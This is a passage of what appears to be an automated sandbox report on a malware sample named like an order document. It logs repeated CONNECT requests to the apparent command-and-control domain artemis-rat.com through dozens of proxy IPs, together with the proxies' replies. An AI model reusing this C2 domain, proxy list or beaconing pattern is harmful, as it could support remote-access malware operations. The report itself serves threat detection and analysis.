                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1397192.168.2.953996175.183.82.22181937672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.521922112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1398192.168.2.953385109.167.134.253307107672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.522398949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.137593031 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1399192.168.2.95408160.190.68.15473027672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.522398949 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Mar 11, 2024 16:16:45.878937006 CET90INHTTP/1.1 200 OK
                                                                                        Content-Type: application/json
                                                                                        Connection: close
                                                                                        Content-Length: 55


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1400192.168.2.953869117.160.250.134807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.526155949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.272680998 CET303INHTTP/1.1 400 Bad Request
                                                                                        Server: openresty
                                                                                        Date: Mon, 11 Mar 2024 15:16:46 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 154
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1401192.168.2.954103181.209.78.789997672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.534981012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.273422003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.476701975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.773772001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.273499012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:58.773390055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:03.164119959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:11.976352930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:29.663743973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1402192.168.2.95370872.206.181.105649357672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.535279989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1403192.168.2.951915184.178.172.28152947672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.537332058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1404192.168.2.954017106.105.218.244807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.542376995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.993499994 CET340INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.12.2
                                                                                        Date: Mon, 11 Mar 2024 15:16:45 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Content-Length: 173
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1405192.168.2.95353052.151.210.20490027672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.547661066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1406192.168.2.954104107.173.255.18312347672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.585771084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1407192.168.2.951808115.127.28.1086747672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.587899923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.632838964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.632839918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.418719053 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1408192.168.2.95278868.1.210.16341457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.589545965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1409192.168.2.954117132.148.245.169194837672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.606722116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.106504917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.687874079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1410192.168.2.95343495.84.166.13880807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.620549917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1411192.168.2.953504138.36.150.1610807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.662420988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1412192.168.2.95197338.156.72.19580807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.668107033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.664113045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1413192.168.2.952104103.97.179.11510807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.670406103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.773072004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1414192.168.2.95358384.201.138.23710807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.756239891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1415192.168.2.95417535.190.107.16300007672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.762043953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1416192.168.2.953559189.240.60.16890907672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.765827894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.035804987 CET72INHTTP/1.1 200 Connection established
                                                                                        Proxy-Agent: Fortinet-Proxy/1.0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1417192.168.2.954197172.67.181.9807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.773382902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.928654909 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:45 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1418192.168.2.95415974.119.144.6041457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.774939060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1419192.168.2.95374264.56.150.10231287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.775468111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.021039963 CET1254INHTTP/1.1 403 Forbidden
                                                                                        Server: squid/3.5.28
                                                                                        Mime-Version: 1.0
                                                                                        Date: Mon, 11 Mar 2024 15:16:45 GMT
                                                                                        Content-Type: text/html;charset=utf-8
                                                                                        Content-Length: 952
                                                                                        X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                        Content-Language: en
                                                                                        X-Cache: MISS from ah_test
                                                                                        Via: 1.1 ah_test (squid/3.5.28)
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 4d 6f 6e 2c 20 31 31 20 4d 61 72 20 32 30 32 34 20 31 35 3a 31 36 3a 34 35 20 47 4d 54 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2018 The Aerohive"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: Web Page Blocked</title><style type="text/css">... body:lang(fa) { direction: rtl; font-size: 100%; font-family: Tahoma, Roya, sans-serif; float: right; }:lang(he) { direction: rtl; } --></style></head><body id="ERR_ACCESS_DENIED"><div id="titles"><h1 style="color: #5b8cbd;">The requested URL cannot be retrieved</h1></div><div id="content"><p>Access to the web page has been blocked in accordance with the network policy. If you believe this is an error, please contact you system administrator.</p><p style="color: #7192b4;">URL: <a href="https://artemis-rat.com/*">https://artemis-rat.com/*</a></p><p style="color: #7192b4;">Category: </p><br></div><div id="footer"><p style="font-size: 12px;">Generated Mon, 11 Mar 2024 15:16:45 GMT</p></div></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1420192.168.2.954216104.20.51.99807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.778153896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
